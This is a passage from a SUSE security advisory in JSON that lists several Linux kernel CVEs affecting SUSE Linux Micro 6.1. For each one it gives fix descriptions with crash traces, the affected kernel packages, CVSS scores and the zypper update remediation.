"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2026-22999"
},
{
"cve": "CVE-2026-23000",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23000"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Fix crash on profile change rollback failure\n\nmlx5e_netdev_change_profile can fail to attach a new profile and can\nfail to rollback to old profile, in such case, we could end up with a\ndangling netdev with a fully reset netdev_priv. A retry to change\nprofile, e.g. another attempt to call mlx5e_netdev_change_profile via\nswitchdev mode change, will crash trying to access the now NULL\npriv-\u003emdev.\n\nThis fix allows mlx5e_netdev_change_profile() to handle previous\nfailures and an empty priv, by not assuming priv is valid.\n\nPass netdev and mdev to all flows requiring\nmlx5e_netdev_change_profile() and avoid passing priv.\nIn mlx5e_netdev_change_profile() check if current priv is valid, and if\nnot, just attach the new profile without trying to access the old one.\n\nThis fixes the following oops, when enabling switchdev mode for the 2nd\ntime after first time failure:\n\n ## Enabling switchdev mode first time:\n\nmlx5_core 0012:03:00.1: E-Switch: Supported tc chains and prios offload\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n ^^^^^^^^\nmlx5_core 0000:00:03.0: E-Switch: Disable: mode(LEGACY), nvfs(0), necvfs(0), active vports(0)\n\n ## retry: Enabling switchdev mode 2nd time:\n\nmlx5_core 0000:00:03.0: E-Switch: Supported tc chains and prios offload\nBUG: kernel NULL pointer dereference, address: 0000000000000038\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 13 UID: 0 PID: 520 Comm: devlink Not tainted 6.18.0-rc4+ #91 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_detach_netdev+0x3c/0x90\nCode: 50 00 00 f0 80 4f 78 02 48 8b bf e8 07 00 00 48 85 ff 74 16 48 8b 73 78 48 d1 ee 83 e6 01 83 f6 01 40 0f b6 f6 e8 c4 42 00 00 \u003c48\u003e 8b 45 38 48 85 c0 74 08 48 89 df e8 cc 47 40 1e 48 8b bb f0 07\nRSP: 0018:ffffc90000673890 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: ffff8881036a89c0 RCX: 0000000000000000\nRDX: ffff888113f63800 RSI: ffffffff822fe720 RDI: 0000000000000000\nRBP: 0000000000000000 R08: 0000000000002dcd R09: 0000000000000000\nR10: ffffc900006738e8 R11: 00000000ffffffff R12: 0000000000000000\nR13: 0000000000000000 R14: ffff8881036a89c0 R15: 0000000000000000\nFS: 00007fdfb8384740(0000) GS:ffff88856a9d6000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000038 CR3: 0000000112ae0005 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n mlx5e_netdev_change_profile+0x45/0xb0\n mlx5e_vport_rep_load+0x27b/0x2d0\n mlx5_esw_offloads_rep_load+0x72/0xf0\n esw_offloads_enable+0x5d0/0x970\n mlx5_eswitch_enable_locked+0x349/0x430\n ? is_mp_supported+0x57/0xb0\n mlx5_devlink_eswitch_mode_set+0x26b/0x430\n devlink_nl_eswitch_set_doit+0x6f/0xf0\n genl_family_rcv_msg_doit+0xe8/0x140\n genl_rcv_msg+0x18b/0x290\n ? __pfx_devlink_nl_pre_doit+0x10/0x10\n ? __pfx_devlink_nl_eswitch_set_doit+0x10/0x10\n ? __pfx_devlink_nl_post_doit+0x10/0x10\n ? __pfx_genl_rcv_msg+0x10/0x10\n netlink_rcv_skb+0x52/0x100\n genl_rcv+0x28/0x40\n netlink_unicast+0x282/0x3e0\n ? __alloc_skb+0xd6/0x190\n netlink_sendmsg+0x1f7/0x430\n __sys_sendto+0x213/0x220\n ? __sys_recvmsg+0x6a/0xd0\n __x64_sys_sendto+0x24/0x30\n do_syscall_64+0x50/0x1f0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\nRIP: 0033:0x7fdfb8495047",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23000",
"url": "https://www.suse.com/security/cve/CVE-2026-23000"
},
{
"category": "external",
"summary": "SUSE Bug 1257234 for CVE-2026-23000",
"url": "https://bugzilla.suse.com/1257234"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2026-23000"
},
{
"cve": "CVE-2026-23001",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23001"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacvlan: fix possible UAF in macvlan_forward_source()\n\nAdd RCU protection on (struct macvlan_source_entry)-\u003evlan.\n\nWhenever macvlan_hash_del_source() is called, we must clear\nentry-\u003evlan pointer before RCU grace period starts.\n\nThis allows macvlan_forward_source() to skip over\nentries queued for freeing.\n\nNote that macvlan_dev are already RCU protected, as they\nare embedded in a standard netdev (netdev_priv(ndev)).\n\nhttps: //lore.kernel.org/netdev/695fb1e8.050a0220.1c677c.039f.GAE@google.com/T/#u",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23001",
"url": "https://www.suse.com/security/cve/CVE-2026-23001"
},
{
"category": "external",
"summary": "SUSE Bug 1257232 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "external",
"summary": "SUSE Bug 1257233 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257233"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2026-23001"
},
{
"cve": "CVE-2026-23005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23005"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/fpu: Clear XSTATE_BV[i] in guest XSAVE state whenever XFD[i]=1\n\nWhen loading guest XSAVE state via KVM_SET_XSAVE, and when updating XFD in\nresponse to a guest WRMSR, clear XFD-disabled features in the saved (or to\nbe restored) XSTATE_BV to ensure KVM doesn\u0027t attempt to load state for\nfeatures that are disabled via the guest\u0027s XFD. Because the kernel\nexecutes XRSTOR with the guest\u0027s XFD, saving XSTATE_BV[i]=1 with XFD[i]=1\nwill cause XRSTOR to #NM and panic the kernel.\n\nE.g. if fpu_update_guest_xfd() sets XFD without clearing XSTATE_BV:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#29: amx_test/848\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 29 UID: 1000 PID: 848 Comm: amx_test Not tainted 6.19.0-rc2-ffa07f7fd437-x86_amx_nm_xfd_non_init-vm #171 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n switch_fpu_return+0x4a/0xb0\n kvm_arch_vcpu_ioctl_run+0x1245/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThis can happen if the guest executes WRMSR(MSR_IA32_XFD) to set XFD[18] = 1,\nand a host IRQ triggers kernel_fpu_begin() prior to the vmexit handler\u0027s\ncall to fpu_update_guest_xfd().\n\nand if userspace stuffs XSTATE_BV[i]=1 via KVM_SET_XSAVE:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#14: amx_test/867\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 14 UID: 1000 PID: 867 Comm: amx_test Not tainted 6.19.0-rc2-2dace9faccd6-x86_amx_nm_xfd_non_init-vm #168 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n fpu_swap_kvm_fpstate+0x6b/0x120\n kvm_load_guest_fpu+0x30/0x80 [kvm]\n kvm_arch_vcpu_ioctl_run+0x85/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThe new behavior is consistent with the AMX architecture. Per Intel\u0027s SDM,\nXSAVE saves XSTATE_BV as \u00270\u0027 for components that are disabled via XFD\n(and non-compacted XSAVE saves the initial configuration of the state\ncomponent):\n\n If XSAVE, XSAVEC, XSAVEOPT, or XSAVES is saving the state component i,\n the instruction does not generate #NM when XCR0[i] = IA32_XFD[i] = 1;\n instead, it operates as if XINUSE[i] = 0 (and the state component was\n in its initial state): it saves bit i of XSTATE_BV field of the XSAVE\n header as 0; in addition, XSAVE saves the initial configuration of the\n state component (the other instructions do not save state component i).\n\nAlternatively, KVM could always do XRSTOR with XFD=0, e.g. by using\na constant XFD based on the set of enabled features when XSAVEing for\na struct fpu_guest. However, having XSTATE_BV[i]=1 for XFD-disabled\nfeatures can only happen in the above interrupt case, or in similar\nscenarios involving preemption on preemptible kernels, because\nfpu_swap_kvm_fpstate()\u0027s call to save_fpregs_to_fpstate() saves the\noutgoing FPU state with the current XFD; and that is (on all but the\nfirst WRMSR to XFD) the guest XFD.\n\nTherefore, XFD can only go out of sync with XSTATE_BV in the above\ninterrupt case, or in similar scenarios involving preemption on\npreemptible kernels, and it we can consider it (de facto) part of KVM\nABI that KVM_GET_XSAVE returns XSTATE_BV[i]=0 for XFD-disabled features.\n\n[Move clea\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23005",
"url": "https://www.suse.com/security/cve/CVE-2026-23005"
},
{
"category": "external",
"summary": "SUSE Bug 1257245 for CVE-2026-23005",
"url": "https://bugzilla.suse.com/1257245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2026-23005"
},
{
"cve": "CVE-2026-23006",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23006"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: tlv320adcx140: fix null pointer\n\nThe \"snd_soc_component\" in \"adcx140_priv\" was only used once but never\nset. It was only used for reaching \"dev\" which is already present in\n\"adcx140_priv\".",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23006",
"url": "https://www.suse.com/security/cve/CVE-2026-23006"
},
{
"category": "external",
"summary": "SUSE Bug 1257208 for CVE-2026-23006",
"url": "https://bugzilla.suse.com/1257208"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
